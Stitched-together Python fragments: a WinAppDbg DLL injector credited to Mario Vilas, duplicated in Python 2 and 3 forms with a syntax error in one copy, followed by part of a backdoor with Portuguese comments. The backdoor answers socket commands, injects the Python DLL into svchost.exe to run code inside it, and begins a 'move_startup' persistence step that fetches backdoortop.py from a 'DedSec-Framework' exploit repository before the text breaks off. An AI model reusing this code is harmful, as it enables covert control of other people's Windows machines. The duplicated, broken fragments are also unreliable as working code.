def load_dll( pid, filename ):
# Instance a Process object.
process = Process( pid )
# Load the DLL library in the process.
process.inject_dll( filename )
def load_dll(pid, filename):
# Instance a Process object.
process = Process(pid)
# Load the DLL library in the process.
process.inject_dll(filename)
def main():
print "Process DLL injector"
print "by Mario Vilas (mvilas at gmail.com)"
print
if len(sys.argv) != 3:
script = os.path.basename(sys.argv[0])
print "Injects a DLL into a running process."
print " %s <pid> <library.dll>" % script
print " %s <process.exe> <library.dll>" % script
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except Exception:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print "Process not found: %s" % sys.argv[1]
return
if len(pl) > 1:
print "Multiple processes found for %s" % sys.argv[1]
for p,n in pl:
print "\t%12d: %s" % (p,n)
return
pid = pl[0][0].get_pid()
print "Using PID %d (0x%x)" % (pid, pid)
dll = sys.argv[2]
print "Using DLL %s" % dll
p = Process(pid)
b = p.get_bits()
if b != System.bits:
print (
"Cannot inject into a %d bit process from a %d bit Python VM!"
% (b, System.bits)
)
return
p.scan_modules()
p.inject_dll(dll)
def main():
print("Process DLL injector")
print("by Mario Vilas (mvilas at gmail.com)")
print
if len(sys.argv) != 3:
script = os.path.basename(sys.argv[0])
print("Injects a DLL into a running process.")
print(" %s <pid> <library.dll>" % script)
print(" %s <process.exe> <library.dll>" % script)
return
System.request_debug_privileges()
try:
pid = HexInput.integer(sys.argv[1])
except Exception:
s = System()
s.scan_processes()
pl = s.find_processes_by_filename(sys.argv[1])
if not pl:
print("Process not found: %s" % sys.argv[1])
return
if len(pl) > 1:
print("Multiple processes found for %s" % sys.argv[1])
for p,n in pl:
print("\t%12d: %s" % (p,n))
return
pid = pl[0][0].get_pid()
print("Using PID %d (0x%x)" % (pid, pid))
dll = sys.argv[2]
print("Using DLL %s" % dll)
p = Process(pid)
b = p.get_bits()
if b != System.bits:
print(()
"Cannot inject into a %d bit process from a %d bit Python VM!"
% (b, System.bits)
)
return
p.scan_modules()
p.inject_dll(dll)
def load_dll(pid, filename):
process = Process(pid)
process.inject_dll(filename)
if dados.startswith("pwd"):
s.send("\n"+str(os.getcwd)+"\n")
if os.name == 'nt':
try:
# Injetando codigo
python_lib = "python{0}{1}.dll".format(sys.version_info.major, sys.version_info.minor)
python_dll = ctypes.util.find_library(python_lib)
s = System()
s.scan_processes()
pl = s.find_processes_by_filename("svchost.exe")
pid = pl[0][0].get_pid()
p = Process(pid)
print('pid', pid)
print('arch', p.get_bits())
t = p.inject_dll(python_dll)
p.scan_modules()
m = p.get_module_by_name(python_lib)
init = m.resolve("Py_InitializeEx")
pyrun = m.resolve("PyRun_SimpleString")
print(init, pyrun)
p.start_thread(init, 0)
time.sleep(0.1)
sh = 'import subprocess; subprocess.call("svchost.exe")'
addr = p.malloc(len(sh))
p.write(addr, sh)
p.start_thread(pyrun, addr)
# Movendo o backdoor pro startup
if dados.startswith("move_startup"):
url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"
